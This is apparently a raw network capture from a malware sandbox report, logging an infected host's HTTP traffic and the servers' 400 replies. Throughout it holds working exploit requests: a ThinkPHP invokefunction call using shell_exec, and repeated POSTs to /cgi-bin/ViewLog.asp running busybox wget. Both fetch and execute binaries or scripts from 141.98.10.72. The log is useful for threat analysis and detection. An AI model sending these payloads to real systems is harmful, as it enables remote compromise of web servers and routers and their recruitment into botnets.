                                                        Feb 14, 2024 09:32:56.210186958 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:56.419816971 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:32:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.144853895.215.58.22080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.400624990 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.1453562112.165.172.22680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.570333958 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:56.851727962 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:32:07 GMT
                                                        Server: lighttpd/1.4.35
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.145621495.217.159.2248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.828011990 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:57.049384117 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:31:51 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.144760431.136.122.1348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.842478037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:59.881288052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:06.025101900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:18.056539059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.911482096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:33.061494112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.144096494.123.86.858080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.855859995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.145233062.29.32.2488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.855896950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.144499631.200.42.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.857835054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.145737062.29.5.348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.866797924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.145110094.121.125.498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:57.103409052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.144437062.29.70.578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:57.103451967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        61192.168.2.143478894.123.48.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:57.103517056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.145132485.163.226.1738080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:57.233285904 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:57.455351114 CET59INHTTP/1.1 405 Method Not Allowed
                                                        Allow: GET


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.144632894.120.234.1678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:57.597029924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.144511894.123.255.1458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:57.600776911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.143307295.101.105.6680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.088285923 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:00.319690943 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:00 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:00 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 37 38 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 35 38 30 26 23 34 36 3b 32 32 63 33 35 30 62 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b781002&#46;1707899580&#46;22c350b3</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.145044288.133.93.9080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.100048065 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.143965488.149.199.8980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.115279913 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:00.348136902 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.144193494.122.84.1398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.123445034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.145671631.200.75.208080
